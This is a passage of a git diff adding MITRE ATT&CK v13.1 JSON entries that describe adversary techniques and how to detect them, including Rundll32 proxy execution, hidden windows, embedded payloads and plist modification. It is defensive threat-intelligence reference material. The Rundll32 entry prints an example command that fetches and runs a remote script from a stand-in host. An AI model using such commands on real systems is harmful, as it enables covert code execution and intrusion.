Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json new file mode 100644 index 0000000000000000000000000000000000000000..dee688f78fe638db6163cae966de834385540ec2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5.json 
@@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--8805934e-d602-45b0-85ae-b60b3c44b08d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T12:25:32.096Z", + "name": "Rundll32", + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). 
Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Gareth Phillips, Seek Ltd.", + "Casey Smith", + "Ricardo Dias", + "James_inthe_box, Me" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. 
Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "File: File Metadata", + "Module: Module Load", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "created": "2020-01-23T18:03:46.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/011", + "external_id": "T1218.011" + }, + { + "source_name": "rundll32.exe defense evasion", + "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.", + "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/" + }, + { + "source_name": "Attackify Rundll32.exe Obscurity", + "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.", + "url": "https://www.attackify.com/blog/rundll32_execution_order/" + }, + { + "source_name": "This is Security Command Line Confusion", + "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.", + "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" + }, + { + "source_name": "Github NoRunDll", + "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.", + "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll" + }, + { + "source_name": "Trend Micro CPL", + "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. 
Retrieved November 1, 2017.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json new file mode 100644 index 0000000000000000000000000000000000000000..69750c3c0c151191f4a36b538009130f2e111b68 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--83af10dc-f96a-42a5-9897-7ea55ce2009d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T16:08:50.706Z", + "name": "Container and Resource Discovery", + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment\u2019s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary\u2019s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Vishwas Manral, McAfee", + "Center for Threat-Informed Defense (CTID)", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Container: Container Enumeration", + "Pod: Pod Enumeration" + ], + "type": "attack-pattern", + "id": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", + "created": "2021-03-31T14:26:00.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1613", + "external_id": "T1613" + }, + { + "source_name": "Docker API", + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/" + }, + { + "source_name": "Kubernetes API", + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json new file mode 100644 index 0000000000000000000000000000000000000000..078e90d4b09e23de5f75856af1cba8af0c59216e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--535122fb-36e3-4321-99d0-62f07de84483", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T21:20:22.578Z", + "name": "Serverless", + "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Awake Security" + ], + "x_mitre_data_sources": [ + "Internet Scan: Response Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", + "created": "2022-07-08T12:39:29.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/007", + "external_id": "T1583.007" + }, + { + "source_name": "AWS Lambda Redirector", + 
"description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", + "url": "https://blog.xpnsec.com/aws-lambda-redirector/" + }, + { + "source_name": "Detecting Command & Control in the Cloud", + "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + }, + { + "source_name": "BlackWater Malware Cloudflare Workers", + "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json new file mode 100644 index 0000000000000000000000000000000000000000..6d5c564ef9bbea31c85e5f5ddab653a2a5f77c09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--99902d16-997d-453e-96ee-56f226d6db4a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Travis Smith, Tripwire" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1143", + "url": "https://attack.mitre.org/techniques/T1143" + }, + { + "source_name": "PowerShell About 2019", + "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1", + "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019." + }, + { + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "source_name": "Antiquated Mac Malware" + } + ], + "modified": "2020-03-13T21:03:18.600Z", + "name": "Hidden Window", + "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be\u00a0apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json new file mode 100644 index 0000000000000000000000000000000000000000..5c3add115e17e52ab0d6af93269f1251460dcd56 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json 
@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--acdf865d-5e24-4e0c-a9c1-9e9a0f260742", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T00:31:33.071Z", + "name": "Standard Encoding", + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "created": "2020-03-14T23:36:52.095Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/001", + "external_id": "T1132.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json new file mode 100644 index 0000000000000000000000000000000000000000..0d2c36e3b4f37364282852ad3057457b65e1bda5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json 
@@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--665ce3f5-0718-486e-a17c-a30c4066fec4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T14:40:48.074Z", + "name": "Embedded Payloads", + "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. 
For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Nick Cairns, @grotezinfosec" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "File: File Metadata" + ], + "x_mitre_system_requirements": [ + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "created": "2022-09-30T18:50:14.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/009", + "external_id": "T1027.009" + }, + { + "source_name": "GitHub PSImage", + "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.", + "url": "https://github.com/peewpw/Invoke-PSImage" + }, + { + "source_name": "Malware Analysis Report ComRAT", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 \u2013 PowerShell Script: ComRAT. Retrieved September 30, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" + }, + { + "source_name": "Trend Micro", + "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.", + "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html" + }, + { + "source_name": "Securelist Dtrack2", + "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! 
My name is Dtrack. Retrieved September 30, 2022.", + "url": "https://securelist.com/my-name-is-dtrack/93338/" + }, + { + "source_name": "Microsoft Learn", + "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.", + "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1" + }, + { + "source_name": "SentinelLabs reversing run-only applescripts 2021", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + }, + { + "source_name": "Sentinel Labs", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json new file mode 100644 index 0000000000000000000000000000000000000000..f5b609f054a6fa5aa1586a6086e0a9cb30daec5d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--5530ce5f-129f-4c30-b0d7-6caae3ee9a37", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1150", + "url": "https://attack.mitre.org/techniques/T1150" + }, + { + "source_name": "Sofacy Komplex Trojan", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. 
(Citation: Sofacy Komplex Trojan)", + "modified": "2022-04-22T18:49:20.520Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Plist Modification", + "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting", + "Whitelisting by file name or path" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json new file mode 100644 index 0000000000000000000000000000000000000000..aa064580802beaeb521561f6a27ca77cd3ad115e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json 
@@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--2fb137e4-5280-43c5-ace7-13f90990ebdf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Scott Knight, @sdotknight, VMware Carbon Black", + "George Allen, VMware Carbon Black" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "type": "attack-pattern", + "created": "2020-06-26T04:01:09.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1556.003", + "url": "https://attack.mitre.org/techniques/T1556/003" + }, + { + "source_name": "Apple PAM", + "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt", + "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020." + }, + { + "source_name": "Man Pam_Unix", + "url": "https://linux.die.net/man/8/pam_unix", + "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020." + }, + { + "source_name": "Red Hat PAM", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules", + "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020." + }, + { + "source_name": "PAM Backdoor", + "url": "https://github.com/zephrax/linux-pam-backdoor", + "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020." + }, + { + "source_name": "PAM Creds", + "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/", + "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020." 
